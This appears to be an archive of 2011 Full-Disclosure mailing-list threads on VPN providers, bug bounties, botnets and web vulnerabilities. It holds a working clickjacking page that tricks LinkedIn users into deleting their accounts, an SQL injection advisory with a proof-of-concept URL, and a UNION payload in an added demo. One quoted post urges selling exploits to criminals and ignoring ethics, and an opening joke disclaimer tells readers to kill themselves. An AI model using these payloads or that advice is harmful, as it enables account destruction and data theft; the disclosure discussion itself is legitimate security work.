This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even if we didn't mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can't use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress..

The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it's a pretty dull legal query and frankly one I'm not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission.
In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother's brother's wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets At Home yesterday.

We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I...umm, no matter what happens, it is NOT, and NEVER
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
On Sun, Nov 20, 2011 at 11:26 PM, xD 0x41 sec...@gmail.com wrote: You need to scrape up on your English, I clearly stated things here, do not try and bend any rules, I simply stated, this feature has been in MS for years... and yea, so what, ?? It's disabled by default, that doesn't mean it still is not there, idiotx2. YOU learn english.

You Sir just made my day!

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Symlink vulnerabilities
On Sun, Nov 6, 2011 at 11:33 PM, xD 0x41 sec...@gmail.com wrote: Nice :) I have put a post about this whole thread on www.crazycoders.com, will add this and props for those involved now :) thx to you, bugs and for others who were involved, also realise that I have now found that bzexe = bzip2 src code, so looking on debian/ubuntu and centos, there is a bzexe or bzip2 on every box,... luckily this issue is patched for both bzip2 and bzexe but know that it is even still being tested now against bunzip2, on decompressions, but has not been done, only know that the src is same as bzip2 executable binary (linux), again, thx to everyone involved, it got patched within a day which is what was the aim... Ubuntu is a little safer ;s cheers. xd

did you get your bananas yet?

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Facebook Attach EXE Vulnerability
nice speculation, but imo it would make them look worse if they turned down the reports, because it will come back to them (either via publication like in this case, or simply someone exploiting it). So while I don't have personal experience working with the facebook security team, at least they have a dedicated channel for reporting security related bugs and even a bounty program. That's more than 99% of the sites/companies offer. btw: someone mentioned that 500 bucks isn't worth the effort, but imo the same people would say the same about $1000, or even $5000.

On Tue, Nov 1, 2011 at 1:54 AM, mutiny mut...@kevinbeardsucks.com wrote: The main thing is that the security division at facebook probably runs the bug hunting page (as with everywhere else, which does make a decent bit of sense). And, if you spot bugs before they do, then that looks bad on them (internally at the company and externally to the world). So, it is not in their interest to openly acknowledge your bugs, especially by paying you cash money (not to mention, accounting is going to hate them if they see bucks leaving the company for any reason, instead of coming in). Not to forget, it is in their interest to downplay your bug to the rest of the company and the world (for those same reasons). If you're doing research /for your own interest/, I recommend maintaining full-disclosure. Embrace the bazaar and burn down the cathedral. If you're interested in making money, the smart route is through script kiddies or whoever (but realize, you'll probably need to go ahead and write a reliable exploit, to see any real cash). Script kiddies (and agents of various governments) often have tons of money to throw around to either bolster their own image (and eventually get arrested) or make money from your bug (especially if you're providing a reliable exploit).
Not to mention, the actual damage that will be caused by the majority of these black hats is nothing compared to what those companies are going to have done, before they eventually crash. You could also monetize your security research by taking an administration, research or QA position. But, too often, you're only ensuring that you'll never be interested in any of the work that crosses your desk, ever again. You'll laugh, if you ever end up taking a real job doing security research, when you see heads getting butted between research teams and QA teams. Most security companies, for example, do not look at their own products (imagine at HP, QA teams for various products would be screaming their heads off at Tipping Point, if they went bug hunting in HP products - often when it's publicly disclosed, those research teams will *still* stay away from it, so the QA teams can tackle it and avoid the headache). It often feels like the first person to market a firewall/IDS/IPS/etc.. pulled off the greatest exploitation, of a security vulnerability (and the most common/reliable vulnerability, social engineering), of all time. In short, what your father didn't tell you is: If you're trying to make money, by doing *independent* security research, *shop around* for a buyer. (Describe the impact to the buyer, to receive a bid, before releasing anything beyond generic details. If they do not make a serious bid, take your ball and go home. If you have the right friends, or enough spare money, involve a lawyer.) And, most importantly, forget what any of these cunts try to tell you about morals or ethics. They're only pushing their point-of-view on you. It's best to, at least, consider all of the view points and make a decision on what works for you/matters to you/etc... None of these people, including myself, can tell you what is morally or ethically wrong. And, don't let them heap shame on you, ever. 
Releasing a remote root/system vulnerability (even if you include a reliable exploit) to full-disclosure, conspiring with a company/individual to keep secrets for X amount of time and selling an exploit to an anonymous bidder should add no more weight to your shoulders than you already carry. Just be sure that *you* are happy with your decision. - sedition

On 10/31/2011 6:11 PM, xD 0x41 wrote: Oh hey, 3k is great! I saw that they just made it look a bit cheap... no wrath but, it is still a MULTI billion now, dollar company, so they should be trying to make SURE they can outbid ANY underground payers.. that's all I had to question. thanks for clearing it up, but sure, if they're paying better now that's cool, I should have said too, it is at least a step in the right direction :s Still, they ARE*** a multi frigging million dollar company lol, so why wouldn't they give say, 1k minimum and make sure they get people more than interested but even fuzzing for bugs which could potentially be in use already... this is something they're not covering at all really with 500 bucks. It is tho, a start...
Re: [Full-disclosure] Wipe off, rub out, reappear...
Is obvious, this is a very well made executable :)

On Tue, Oct 11, 2011 at 12:18 PM, xD 0x41 sec...@gmail.com wrote: I don't care about *their* setup, and I said that, I only stated what CAN be done, in capable hands.. simple. You are reading deep into something you seem to understand fkall about, seriously.

On 11 October 2011 21:16, Christian Sciberras uuf6...@gmail.com wrote: I already beat you up to it - you know nothing about their setup. You don't know if their infection is the result of a botnet. I don't deny you know anything about botnets, I'm just saying from the looks of it you jumped to a load of conclusions without any proof whatsoever.

On Tue, Oct 11, 2011 at 12:11 PM, xD 0x41 sec...@gmail.com wrote: screw it, I'll bite, I know my shit here.. If I was not so smart, then I guess I would not have a modified ircd which is similar... wow I know.. just seems you don't know crap about cc botnets, that's fo sure. I think I outlined a *good* setup, as I have seen it, or would not have bothered to state the mods made.. is that simple. whether it is hard to code or not, is not my business, nor I care for.. I just know how they run, and, don't try bs me about what I do and don't know, because on this topic son, I have plenty of experience, and could easily match this with an AV spokesperson, and would not hesitate to, but what gains it to me? None. I am here for those who give a crap, you sir, know nothing, at all, about even the controlling side of a good botnet which spreads fast. Most people simply do not want you on them, then the better ones simply hide as users on irc anyhow ;) Then again, I wouldn't know shit ey. gnite :-) have fun trying to pick apart anything with me in this area, I will enjoy tearing your anus out, word by word if I have to. xd

On 11 October 2011 20:29, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying.
Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5-liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart.

On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, which is normal nowadays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters, then do this to the bot, remove USER mode completely, only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynamic dns... it is not impossible, it is happening now, and, it is also visible, however, these C&C centres are so advanced, IDS are just not getting enough info... you cannot do a thing on the properly modified control centres, and, I have seen that code, it is an extremely modified version of ircd... it cannot be used by a NON operator, and uses a totally different rfc to phone home etc, thus making conventional methods used atm useless... as they will look for the strings that they know, and always IDS will perform some string of commands, and then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionally ingenious when it comes to these things, and masking an exe nowadays is not as simple as some people's SFX rar kits :) So even kits nowadays can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart C&C centres, you won't take down so easily, and they will move before you can even decrypt their settings... which is exactly why stuxnet is non stoppable.. unless the owner shuts it down, it won't be killed..
xd

On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If its bot net code and it is behind an air barrier then it will never phone home. They

It already broke the air wall to get in. It can certainly do so to get out. Bob

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] VPN providers and any providers in general...
On Wed, Oct 5, 2011 at 3:53 AM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 20:35:16 CDT, adam said: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? tl;dr: Doesn't matter, you can end up in the slammer anyhow. Actually, the general rule is that if it's a civil proceeding it's only civil contempt. Refusing to comply with warrants or subpoenas pursuant to a criminal proceeding could very well get you criminal contempt. And even in civil proceedings the judge can stick you in jail till you decide to change your mind. And we're certainly discussing a criminal proceeding here. Journalist Judith Miller got to spend 4 months in jail for refusing to cooperate with a grand jury investigation. https://secure.wikimedia.org/wikipedia/en/wiki/Judith_Miller_(journalist)#Contempt_of_court And this dude spent 14 years in jail on a *civil* contempt charge: https://secure.wikimedia.org/wikipedia/en/wiki/H._Beatty_Chadwick http://searchenginewatch.com/article/2116048/Google-Forced-to-Release-WikiLeaks-Volunteers-Gmail-Info Google and Sonic.net, a small Internet service provider, have been forced to hand a WikiLeaks volunteer’s email information to the U.S. government under a secret and controversial court order. The type of information released includes login IPs of the volunteer and those with whom he communicated by email, as well as their email addresses. Sonic fought the order, dated January 4, 2011, but lost. Chief executive Dane Jasper told the Wall Street Journal that although the legal battle was expensive, “... it was the right thing to do.” It is unclear whether Google fought the order or willingly complied. ... The law under which this questionable seizure of private communications is permitted is called the Electronic Communications Privacy Act. 
It dates back to 1986, three years before the World Wide Web was born. Google and Microsoft are both members of a coalition fighting for reform, as this law allows law enforcement easier access to emails than postal mail. WikiLeaks founder Julian Assange has previously warned U.S. citizens that their Facebook, Yahoo, and Google account information is quite accessible to U.S. government officials. In fact, law enforcement officials don’t even need a search warrant to access private emails. While a search warrant would require they show probable cause that a crime has been committed, they must only demonstrate that they have “reasonable grounds” to believe the email records could be “relevant and material” to an investigation under the ECPA. Another controversial element of this type of email seizure is that the person isn’t notified that their email has been searched. Google and Sonic both lobbied, in this case, to be allowed to notify Appelbaum of the seizure. Under the 1986 law, however, they are prohibited from doing so. This type of court order is usually sealed.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
it seems that you aren't familiar with what Clickjacking means then...

On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 sec...@gmail.com wrote:

That's just lame dude, if you could remove OTHER people's accounts, then I'd say *clap clap*... but own account... what about just clicking close account, and let's skip creating a html page for this... :)

cheers

On 8 October 2011 17:06, asish agarwalla asishagarwa...@gmail.com wrote:

Be logged into Linkedin, in firefox
Create a HTML page using the below code
Open the created HTML page in a new firefox tab
Play the simple game

    <html>
    <head>
    <style>
    button.dummy1 { position: absolute; top: 75px; left: 177px; z-index: -10 }
    button.dummy3 { position: absolute; top: 214px; left: 177px; z-index: -10 }
    #Div3 { opacity: 0; position: absolute; top: 25px; left: 160px; }
    #Div2 { opacity: 1; position: absolute; top: 65px; left: 340px; }
    #Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; }
    #victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; }
    #victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width: 800px; height: 800px; }
    </style>
    </head>
    <body>
    <div><h1>Please Click Twice on the Right Options And Then Click Submit</h1></div>
    <div id="Div3"><h1>55+27=?</h1></div>
    <div id="victim2"><h1>55 </h1></div>
    <div id="Div1"><h1>82</h1></div>
    <div id="Div2"><h1>95</h1></div>
    <button type="button" class="dummy3">Submit</button>
    <div id="victim">
    <iframe src="https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1;" border="0" scrolling="no" width="650" height="1100"></iframe>
    </div>
    </body>
    </html>

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
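Whether a PoC like the one above works at all depends on one thing: does the target page allow itself to be framed by a foreign origin? The following is an added example (not code from the thread, from the PoC author, or from LinkedIn) that takes a response's headers and decides whether a given origin could frame the page, honouring CSP frame-ancestors over X-Frame-Options the way browsers do. The header sets, the page URL and the attacker origin are constructed for the demo.

```python
"""Added example (not code from the thread or from LinkedIn): given a
response's headers, decide whether a browser would let another origin frame
the page, which is the precondition for a clickjacking PoC like the one above.
Header sets below are constructed for the demo, not captured responses."""
from urllib.parse import urlsplit


def _source_matches(source, framer, page):
    """Match one CSP frame-ancestors source expression against the framer's origin."""
    src = source.strip().strip("'").lower()
    f = urlsplit(framer)
    if src == "none":
        return False
    if src == "self":
        p = urlsplit(page)
        return (f.scheme, f.hostname, f.port) == (p.scheme, p.hostname, p.port)
    if src in ("http:", "https:"):          # scheme-source
        return f.scheme == src[:-1]
    if "://" not in src:                    # host-source without a scheme
        src = f.scheme + "://" + src
    s = urlsplit(src)
    host_ok = f.hostname == s.hostname or (
        s.hostname.startswith("*.") and f.hostname.endswith(s.hostname[1:]))
    return f.scheme == s.scheme and host_ok and s.port in (None, f.port)


def framing_allowed(headers, page_url, framer_origin):
    """True when framer_origin may embed page_url in an <iframe>.

    frame-ancestors wins over X-Frame-Options when both are present; no
    header at all means the page is frameable by anyone."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return any(_source_matches(s, framer_origin, page_url) for s in parts[1:])
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _source_matches("'self'", framer_origin, page_url)
    # Missing, malformed, or the obsolete ALLOW-FROM form (ignored by current
    # browsers, so it protects nothing): the page can be framed.
    return True


# Constructed header sets standing in for the settings page targeted by the PoC.
PAGE = "https://www.linkedin.com/secure/settings"
ATTACKER = "https://attacker.example"
SAMPLES = {
    "no protection": {},
    "xfo deny": {"X-Frame-Options": "DENY"},
    "xfo sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp none": {"Content-Security-Policy": "frame-ancestors 'none'"},
    "csp partner": {"Content-Security-Policy":
                    "default-src 'self'; frame-ancestors 'self' https://*.partner.example"},
    "csp overrides xfo": {"X-Frame-Options": "DENY",
                          "Content-Security-Policy": "frame-ancestors https://attacker.example"},
}


def report(samples=SAMPLES, framer=ATTACKER, page=PAGE):
    """Map each sample name to whether `framer` could frame `page`."""
    return {name: framing_allowed(hdrs, page, framer) for name, hdrs in samples.items()}


if __name__ == "__main__":
    for name, allowed in report().items():
        print(f"{name:20s} frameable by attacker: {allowed}")
```

The "csp overrides xfo" sample is the one to remember: a frame-ancestors directive that lists an origin silently switches off a DENY in X-Frame-Options, so both headers have to be reviewed together.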
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
The document appears to be password protected as well. I've tried to open it in a VM and it prompts for a password.

it seems that you missed it: Password to access the report is: 8nj98F4h9AW

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] VPN providers and any providers in general...
http://vpn.hidemyass.com/vpncontrol/legal.html

VPN Data
What we store: Time stamp and IP address when you connect and disconnect to our service.
...
Legalities
Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities.

people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent.

On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote:

maybe they are law abiding companies? :)

Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... which is half the reason i believe the people use those ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-paradise vpn service.

xd

On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote:

On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote:

On 10/3/2011 10:42 AM, Antony widmal wrote:

Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly shows your 3 year old mentality. Also, could you please stop posting as GLOW Xd as well? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony

Actually XD and me are two different people.

Second, issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities.

maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
i assume, there is way more credit-fraud and rape etc going on, than wares... or, police having to waste time, on wares... i think police themselves detest those things, and hence why the clouds still linger over some websites which should be 'down' yet, are not.

it's not working like that, you can't expect that the cops/feds won't chase piracy while there are more serious crimes unresolved. sadly.

That, is simply isp not complying with a takedown order which is, completely up to them. Why would they want to lose good customers/people who bring them even traffic and revenue through websites.

it simply: not worth taking the risk. if you won't comply, you are risking that your whole business can go down the toilet, and if and when you can prove that you are right, you lost your business already. and usually those customers are the minority of your client base, and they are a risk for your own infrastructure also (they can hack/abuse your own servers).

I don't promote ads on my one, but i have always maintained a very steady and friendly, helpful with security, to my hosters which they really appreciated. So, sometimes being in IT pays off... I guess... but what a struggle to get anywhere, even for the harder stuff, and people like n3td34v completely don't see that,

yep, we only see what you show on this list, and so far, you didn't really work on your whitehat image.

the whole issue of freedom of speech and, security especially, ie: when i submit a PoC, anything nowadays, could happen..

yeah, the net seems to be more similar than the real life, it's much harder to be truly anonymous nowadays.

these are the clouds i really wish to lift, in order though, I first must set some people on this list into the same state of mind, which is proving to be a little harder than i expected.

I think the problem is more about how you deliver the message, not the message itself.

n3td3v thinks i am personally attacking his whole persona, which, i should, and could, maybe pentest him and then, see if that is illegal. If so then, i would assume my tool of choice, nmap, would also be in danger?

you brought this (cat)fight to the mailing list, so of course he thinks that you are personally attacking him.

hehe... see how this can get offtopic, but really it is the same topic of security/vpn and now, i am bringing it to an isp and Noc level... and hopefully, some others will see the things said, and indeed, they know there is a lot more hard crime that could be done by police, which would benefit ALL communities, and people IRL, as in kids, in some cases.

see above, you can't expect that lesser crimes are ignored because there are other more serious crimes out there.

I also detest the use of the law, for low level crappy crimes when they could be rm -rf'ing REAL dangerous people who actually, are trying to harm others, or simply, out for extortion and no other reason.

see above.

I can say now safely, i am from .au and, i feel happy we have the laws here for serious crimes, i detested the dd0s kiddy david cecil's 'defacing' and, trying to cry out for work... what a b*m... I simply look in the paper, and ring. Anyhow, he is in a cell, and for good reason, and, ofc, things with him got more serious because he was defrauding people of money. This is when, things go down, when you directly steal funds, ie, if i were to steal shares in M$ using a PC, i'd be considered a cyber-terrorist, and, the crime would also be classed as a cyber-attack of terror or some such name... because, it not only terrorises, but it also steals data and, not 'steals' but uses it. which is not very nice to lose a credit rating, or have feds on your door, coz you trusted a website that got 'owned' and, your card used for like 90k, used to signup to a million places, and whatever else.. now, this would have a huge bearing on the crime, because the impact is huge on the victim.

I simply think, police online, are doing the right thing, and arresting those involved in child porn, and other detestable activity, rather than worrying about the small guys, who are simply using the net, as a playground.

http://en.wikipedia.org/wiki/Broken_windows_theory

if you allow the small fishes to play, they will grow big. maybe not everyone, but imo many blackhats started with irc wars, taking over channels, defacing small sites, etc. if you see that you can break the rules and get away with it, you will push for more. at least for those who really enjoy doing this kind of stuff.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
On Mon, Oct 3, 2011 at 10:15 AM, GloW - XD doo...@gmail.com wrote:

if you allow the small fishes to play, they will grow big.

rubbish. Complete rubbish. That's a very broad spectrum of people here, and while i may not seem whitehat at all, and am no hat really, I try to remain neutral, and, that guy,

as I mentioned, we only know you about as much as you share here (except those who are digging up your identity right now, but I'm sure that most people really don't care).

decided to show me he was attacking me and, accusing, for things i simply have not done, which, is a lot like what you are trying to do.

what do you mean by what I'm trying to do? I just stated that you brought this publicity to yourself.

I have been in IT sec for years, and never once committed any kind of fraud. How pathetic would that be, if my own business was to flunk, because of say, cc fraud.. which, i have personally experienced, and would not wish on my enemies.

Where did I accuse you of doing such kind of attacks? And it would be indeed pathetic, but the world is full of pathetic people sadly.

So please take the socialist theories elsewhere.

uhm, what?

PS: In real life, they go after the fishes who make them lose money, not small nor big, it is VICTIM impact. always will be. And until there are firm enough laws, this will not change. Why would they chase me, even, for one pirated iso, not even pirated, a copy of an original i believe. the rest is pure freeware, from ms, i just removed the links purposely, but have them safely tucked here. So, who is silly for assuming that, i am low level at best with piracy not even a pirate, it was a backup, which i used as experimental material in the end..

that would be too logical for the governments, cops, and other authorities, so don't count on it. :( charging Assange is a good example.

if you step on someone's leg powerful enough, or you are simply unlucky, and end up being the scapegoat, you are screwed: http://news.yahoo.com/court-reinstates-675-000-damages-downloading-152335714.html

Your socialist views, probably show where you are from, or shine through that customs, while we in the real world, tend to believe in the 'law'. ;-) rofl... you make me laugh. have a good read party boi.

xd

that was rude and unjustified, it seems that it was too hard for you to counter my arguments. :/

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] VPN providers and any providers in general...
On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote:

On 10/3/2011 10:42 AM, Antony widmal wrote:

Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly shows your 3 year old mentality. Also, could you please stop posting as GLOW Xd as well? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony

Actually XD and me are two different people.

Second, issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities.

maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Facebook North Scottsdale Inventory - Remote SQL Injection Vulnerability
2011-00-00: Vendor Fix/Patch

On Thu, Sep 29, 2011 at 11:34 AM, resea...@vulnerability-lab.com wrote:

Title:
Facebook North Scottsdale Inventory - Remote SQL Injection Vulnerability

Date:
2011-09-29

References:
http://www.vulnerability-lab.com/get_content.php?id=272

VL-ID:
272

Introduction:
The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the ScottsdaleInventory. (Copy of the Vendor Homepage: http://apps.facebook.com/scottsdaleinventory/share.php)

Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)

Abstract:
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party web application - North Scottsdale Inventory (apps.facebook.com).

Report-Timeline:
2011-09-17: Vendor Notification
2011-09-18: Vendor Response/Feedback
2011-00-00: Vendor Fix/Patch
2011-09-29: Public or Non-Public Disclosure

Status:
Published

Affected Products:
North Scottsdale Inventory (Facebook Application) - 2011/Q3

Exploitation-Technique:
Remote

Severity:
High

Details:
A SQL Injection vulnerability is detected on the North Scottsdale Inventory facebook application (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms.

Vulnerable Module(s):
[+] North Scottsdale Inventory - Facebook 3rd Party Application

Vulnerable Param(s):
[+] ?fbid= carid=

Affected Application:
[+] http://apps.facebook.com/scottsdaleinventory/

--- SQL Error Logs ---
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near -1` *view* at line 1
---

Picture(s):
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

URL: apps.facebook.com/scottsdaleinventory/
Path: /scottsdaleinventory/
File: share.php
Param: ?fbid= carid=

Example: http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?fid=[x]carid=[x]

PoC: http://apps.facebook.com/scottsdaleinventory/share.php?fbid=-1%27carid=-1%27

Solution:
Use the prepared statement class to fix the sql injection vulnerability and filter sql error requests. Set error(0) to prevent against information disclosure via exceptions or error reports.

Risk:
The security risk of the application sql injection vulnerability is estimated as high.

Credits:
Vulnerability Research Laboratory - N/A Anonymous

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab

-- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
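The advisory's two findings (a quote in fbid/carid breaks the query, and the application echoes the DBMS error) and its recommended fix (prepared statements, suppressed error output) can be shown side by side. The following is an added example, not the advisory's or the application's code: it runs the same share.php-style lookup against an in-memory SQLite database with constructed rows (the real application used MySQL from PHP; the pattern and the fix are the same). Table and column names other than fbid/carid are assumptions.

```python
"""Added example (not the advisory's or the application's code): the
vulnerable pattern the advisory describes (request parameters pasted into
SQL text) beside the prepared-statement fix it recommends. Uses an
in-memory SQLite database with constructed rows; the real app used MySQL/PHP,
but the lesson is identical."""
import sqlite3


def make_db():
    """Constructed schema: the inventory table plus a table an attacker would want."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE cars(carid INTEGER PRIMARY KEY, fbid INTEGER, model TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, email TEXT, pwhash TEXT);
        INSERT INTO cars VALUES (1, 100, 'sedan'), (2, 101, 'coupe');
        INSERT INTO users VALUES (1, 'admin@example.invalid', 'not-a-real-hash');
    """)
    return con


def share_vulnerable(con, fbid, carid):
    """share.php-style lookup: fbid and carid land verbatim inside the query text."""
    sql = f"SELECT model FROM cars WHERE fbid = '{fbid}' AND carid = '{carid}'"
    return con.execute(sql).fetchall()


def share_fixed(con, fbid, carid):
    """Same lookup with bound parameters: the driver never treats input as SQL."""
    sql = "SELECT model FROM cars WHERE fbid = ? AND carid = ?"
    return con.execute(sql, (fbid, carid)).fetchall()


def share_fixed_quiet(con, fbid, carid):
    """Also swallow driver errors, so a malformed request cannot leak the DBMS's
    error text the way the advisory's error log does."""
    try:
        return share_fixed(con, fbid, carid)
    except sqlite3.DatabaseError:
        return []


def probe(con, fbid, carid):
    """Run the vulnerable lookup and report either rows or the leaked error message."""
    try:
        return ("rows", share_vulnerable(con, fbid, carid))
    except sqlite3.DatabaseError as e:
        return ("error", str(e))


# The advisory's probe: a stray quote in both parameters breaks the query,
# and the application echoes the DBMS error, confirming the injection point.
QUOTE_PROBE = ("-1'", "-1'")
# A UNION payload that reads a different table through the same query.
UNION_PAYLOAD = ("100", "-1' UNION SELECT email FROM users --")


if __name__ == "__main__":
    con = make_db()
    print(probe(con, *QUOTE_PROBE))        # ('error', '...syntax error')
    print(probe(con, *UNION_PAYLOAD))      # ('rows', [('admin@example.invalid',)])
    print(share_fixed(con, *UNION_PAYLOAD))  # [] : the payload is just a string
```

Note that share_fixed() alone is the fix; share_fixed_quiet() only addresses the second point in the advisory (error disclosure) and is no substitute for parameterisation.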
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
yeah, and usually the same goes for calling others kids ;)

On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote:

#pure-elite , rofl... yes indeed :P hehe... nice story tho... funny about the elite channel thing... why do ppl tag themselves as elite? usually when they are not... ohwell, thats efnut :s (irc sucks)

xd

On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

Hope this sends correctly, new email client and all... But seeing as it is an international investigation many people have been bending over backwards to assist LEO on this. HMA and perfect privacy were the VPNs of choice for them it would appear, oh, and he was part of the #pure-elite channel on that IRC server, and hence, considered by LEO and others as Part of LulzSec. TL;DR, this is nothing new.

On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote:

And the guy wasn't even a part of lulzsec

On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote:

http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html

Though HMA claims they complied with a court order, it looks as if they facilitated a law enforcement request. The US and the FBI have no jurisdiction in the UK.

Jeff

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] China - the land of open proxies
not asked, but ~suggested:

This is offered as data you may be able to use for forensic purposes or router block lists.

On Fri, Sep 2, 2011 at 12:42 AM, Thor (Hammer of God) t...@hammerofgod.com wrote:

